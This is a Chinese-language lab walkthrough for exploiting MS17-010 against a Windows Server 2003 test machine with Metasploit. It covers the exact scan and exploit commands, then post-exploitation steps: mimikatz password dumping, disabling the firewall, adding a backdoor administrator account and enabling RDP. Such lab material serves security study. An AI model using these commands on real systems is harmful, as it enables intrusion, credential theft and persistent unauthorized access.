复现漏洞
靶机:Windows server 2003 IP:192.168.64.129
攻击机:kali 2021
1.在kali中启动msf模块
在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。
进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。
2.搜索ms17_010:search ms17_010
3.使用命令:use auxiliary/scanner/smb/smb_ms17_010
4.show options 输入options来获得帮助命令。
RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描。
5.set rhosts 192.168.64.129 扫描靶机(windows 2003 )并输入run或者exploit攻击。
出现上述的情况表明存在漏洞,即445端口开放。
漏洞利用
1.启动windows2003攻击模块
输入命令:use exploit/windows/smb/ms17_010_psexec
2.输入run或者exploit开始攻击
攻击成功后出现如上页面。接下来可以使用kali操控靶机。
kali操作靶机
1.获取屏幕截图
直接输入screenshot即可获得屏幕截图。
2.获取密码
输入load mimikatz,然后再输入wdigest。即可获得
3.shell控制
- 首先关闭靶机防火墙
netsh firewall set opmode mode=disable
查看防护墙状态:netsh firewall show state
- 添加用户:net user hack 123 /add
查看靶机用户:net user
- 给已添加的用户做提权处理:net localgroup Administrators hack /add
可以输入net user确认是否提升为管理员权限。
- 查看端口靶机端口开放情况。netstat -ano
如果3389端口没有开放,可以输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\ Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启。
查看3389端口:netstat -aon | findstr "3389"
- 远程操控靶机:在控制面板输入rdesktop ip即可,我的主机即输入rdesktop 192.168.64.129